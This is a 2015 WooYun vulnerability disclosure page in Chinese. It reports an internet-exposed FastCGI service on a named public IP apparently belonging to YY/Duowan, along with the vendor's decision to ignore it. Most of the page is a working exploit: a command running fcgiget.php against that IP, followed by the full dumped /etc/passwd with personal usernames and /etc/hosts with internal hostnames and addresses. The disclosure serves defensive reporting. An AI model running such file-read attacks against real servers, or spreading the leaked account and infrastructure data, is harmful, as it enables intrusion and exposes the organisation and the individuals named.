乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-03: 细节已通知厂商并且等待厂商处理中 2015-02-08: 厂商已经主动忽略漏洞,细节向公众公开
RT
还是fastcgi对外的问题额,发了吧
[root@localhost FastCGI]# /usr/local/php/bin/php fcgiget.php 113.106.100.82:9000/etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:102::/home/syslog:/bin/falseklog:x:102:103::/home/klog:/bin/falsesshd:x:103:65534::/var/run/sshd:/usr/sbin/nologindspeak:x:1000:1000::/home/dspeak:/sbin/nologinyuwanfu:x:1003:1003::/home/yuwanfu:/bin/bashlandscape:x:104:110::/var/lib/landscape:/bin/falsesnmp:x:105:65534::/var/lib/snmp:/bin/falsenagios:x:106:111::/var/log/nagios:/bin/falsezabbix:x:107:112::/var/run/zabbix-server/:/bin/falsewuhaiting:x:1051:1051::/home/wuhaiting:/bin/bashuser_00:x:1054:1054::/home/user_00:/bin/bashchenguanghui:x:1058:1058::/home/chenguanghui:/bin/bashchenyongqiang:x:1059:1059::/home/chenyongqiang:/bin/bashlisheng:x:1060:1060::/home/lisheng:/bin/bashluojia:x:1061:1061::/home/luojia:/bin/bashlvsongmei:x:1062:1062::/home/lvsongmei:/bin/bashtangzhenquan:x:1065:1065::/home/tangzhenquan:/bin/bashxiejunlong:x:1066:1066::/home/xiejunlong:/bin/bashxuzhijian:x:1067:1067::/home/xuzhijian:/bin/bashliaojunlian:x:1070:1075::/home/liaojunlian:/bin/bashzengyueming:x:1074:1076::/home/zengyueming:/bin/bashzhangguorui:x:1075:1077::/home/zhangguorui:/bin/bashlanzhaobao:x:1076:1078::/home/lanzhaobao:/bin/bashzhongjianhui:x:1078:1080::/home/zhongjianhui:/bin/bashlianyongjian:x:2064:2064::/home/lianyongjian:/bin/bashzhaokeke:x:2676:2676::/home/zhaokeke:/bin/bashliuxingzhong:x:2704:2704::/home/liuxingzhong:/bin/bashchenshunyao:x:2419:2419::/home/chenshunyao:/bin/bashchenxiaokang:x:2009:2009::/home/chenxiaokang:/bin/bashlinxiaobin:x:2082:2082::/home/linxiaobin:/bin/bashlitianming:x:2089:2089::/home/litianming:/bin/bashwangnian:x:2724:2724::/home/wangnian:/bin/bashzhanghao1:x:2677:2677::/home/zhanghao1:/bin/bashxiaohaoteng:x:2650:2650::/home/xiaohaoteng:/bin/bash
[root@localhost FastCGI]# /usr/local/php/bin/php fcgiget.php 113.106.100.82:9000/etc/hostsX-Powered-By: PHP/5.2.6-3ubuntu4.6Content-type: text/html127.0.0.1 localhost127.0.1.1 kickseed# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allroutersff02::3 ip6-allhosts121.14.37.147 balance.yy.duowan.com121.14.37.145 smproxy1.yy.duowan.com59.151.23.85 smproxy3.yy.duowan.com59.151.47.70 sconf.yy.com58.215.46.21 mirror.yy.duowan.com221.228.209.123 subcul.redis.yy.com221.228.209.123 uid2tid.redis.yy.com220.181.86.221 subcul2.redis.yy.com220.181.86.221 uid2tid2.redis.yy.com61.152.250.207 smproxy2.yy.duowan.com10.20.81.107 manager.repos.yy.duowan.com# For appmgr sdk121.14.36.25 nappmgr.open.yy.com# For service 121.14.37.154 servicemgr.yy.duowan.com106.38.255.66 subcul.yy.com221.228.209.123 subcul2.yy.com121.14.37.153 config.yy.duowan.com# For appmgr121.14.36.25 appdisp1.open.yy.com58.215.46.93 appdisp2.open.yy.com58.215.46.81 appdisp3.open.yy.com121.14.36.26 appdisp4.open.yy.com58.215.46.92 appdisp5.open.yy.com121.14.36.25 consolemgr.open.yy.com121.14.43.142 oams.yy.duowan.com220.181.86.207 sdaemon.yy.duowan.com121.14.37.153 sdaemon2.yy.duowan.com119.147.160.90 yycookie.yy.duowan.com121.14.37.153 rdaemon.yy.duowan.com220.181.86.207 rdaemon2.yy.duowan.com121.14.37.153 relayDaemon.yy.duowan.com220.181.86.207 relayDaemon2.yy.duowan.com221.228.79.31 bc.yy.duowan.com221.228.79.32 bc2.yy.duowan.com106.38.255.160 servicemgr2.yy.duowan.com106.38.255.130 oams2.yy.duowan.com
不对外
危害等级:无影响厂商忽略
忽略时间:2015-02-08 19:28
暂无